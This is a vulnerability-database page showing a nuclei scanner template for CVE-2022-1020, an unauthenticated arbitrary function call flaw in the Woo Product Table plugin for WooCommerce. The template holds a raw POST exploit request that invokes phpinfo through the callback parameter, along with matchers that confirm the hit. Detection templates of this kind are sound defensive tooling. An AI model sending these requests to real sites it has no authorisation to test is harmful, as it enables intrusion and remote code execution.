Lucene search
K

WordPress WooCommerce <3.1.2 - Arbitrary Function Call

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

WordPress WooCommerce <3.1.2 - Arbitrary Function Call. Allows remote code execution

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-1020
18 Apr 202218:15
attackerkb
Circl
CVE-2022-1020
18 Apr 202222:23
circl
CNNVD
WordPress plugin WooCommerce 安全漏洞
18 Apr 202200:00
cnnvd
CVE
CVE-2022-1020
18 Apr 202217:10
cve
Cvelist
CVE-2022-1020 Woo Product Table < 3.1.2 - Unauthenticated Arbitrary Function Call
18 Apr 202217:10
cvelist
NVD
CVE-2022-1020
18 Apr 202218:15
nvd
OSV
CVE-2022-1020
18 Apr 202218:15
osv
Patchstack
WordPress Product Table for WooCommerce plugin <= 3.1.1 - Unauthenticated Arbitrary Function Call vulnerability
23 Mar 202200:00
patchstack
Prion
Cross site request forgery (csrf)
18 Apr 202218:15
prion
RedhatCVE
CVE-2022-1020
22 May 202523:29
redhatcve
Rows per page
id: CVE-2022-1020

info:
  name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call
  author: Akincibor
  severity: critical
  description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
  impact: |
    It allows remote code execution on the affected system.
  remediation: |
    Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1020
    cwe-id: CWE-352
    epss-score: 0.26228
    epss-percentile: 0.97746
    cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: codeastrology
    product: woo_product_table
    framework: wordpress
  tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology,vkev,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_key=a&perpose=update&callback=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
        part: body
# digest: 4a0a0047304502210087d22d8031f98ef3a794279cb8ebb6d88bcf9d592ab5e53a88f64bc1729b9f8d02202e4b42df1929e110d9b24c9a0f927b82c6e4f67c76b4da6fc9490c739a82bd3d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.26228
23